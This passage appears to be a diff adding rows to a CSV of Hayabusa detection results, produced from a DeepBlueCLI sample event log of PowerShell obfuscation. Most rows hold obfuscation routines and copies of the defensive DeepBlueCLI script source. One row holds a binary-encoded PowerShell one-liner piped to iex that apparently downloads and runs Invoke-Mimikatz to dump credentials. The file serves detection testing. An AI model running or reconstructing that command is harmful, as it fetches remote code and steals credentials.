(($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:27:04.661 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:27:09.364 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:55:52.559 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:55:52.574 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:55:53.960 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:55:53.968 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:55:53.973 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:55:53.976 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:55:53.978 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:55:53.981 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:55:53.991 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:55:54.000 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:55:54.036 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:55:54.050 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:55:56.644 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:55:56.651 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:55:56.696 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:56:09.115 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"-join('1001001n1000101-1011000g100000<101000e1001110F1100101-1110111@101101<1001111i1100010i1101010n1100101n1100011e1110100@100000-1001110n1100101n1110100n101110e1010111n1100101;1100010<1000011F1101100{1101001-1100101-1101110-1110100i101001<101110-1000100-1101111<1110111F1101110;1101100n1101111i1100001e1100100{1010011;1110100<1110010@1101001i1101110i1100111{101000e100111e1101000@1110100e1110100g1110000g1110011-111010-101111;101111;1110010@1100001@1110111-101110;1100111{1101001F1110100-1101000@1110101{1100010e1110101n1110011@1100101i1110010-1100011i1101111n1101110e1110100i1100101;1101110@1110100n101110i1100011<1101111n1101101-101111n1101101@1100001<1110100i1110100-1101001{1100110;1100101i1110011-1110100F1100001n1110100{1101001@1101111F1101110e101111-1010000<1101111e1110111{1100101e1110010;1010011i1110000n1101100@1101111F1101001e1110100i101111n1101101-1100001;1110011<1110100i1100101<1110010i101111<1000101;1111000;1100110-1101001-1101100<1110100;1110010F1100001<1110100{1101001@1101111n1101110i101111g1001001e1101110<1110110{1101111F1101011n1100101{101101@1001101-1101001{1101101i1101001n1101011n1100001-1110100;1111010<101110-1110000e1110011g110001e100111-101001;111011F100000@1001001{1101110g1110110{1101111i1101011F1100101-101101n1001101g1101001e1101101@1101001-1101011{1100001-1110100{1111010@100000g101101;1000100-1110101g1101101g1110000F1000011g1110010n1100101;1100100<1110011'.splIT( '<{genF-i;@' )| FOreAcH { ([coNvErt]::toInT16(([StriNG]$_) ,2 ) -AS [CHAR]) })| &( ([STRinG]$VerBosEPREfereNce)[1,3]+'x'-jOiN'')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:56:09.116 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ ([coNvErt]::toInT16(([StriNG]$_) ,2 ) -AS [CHAR]) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:56:33.244 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:56:34.464 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:56:34.470 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue <at> backshore <dot> net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:56:34.470 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue <at> backshore <dot> net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: 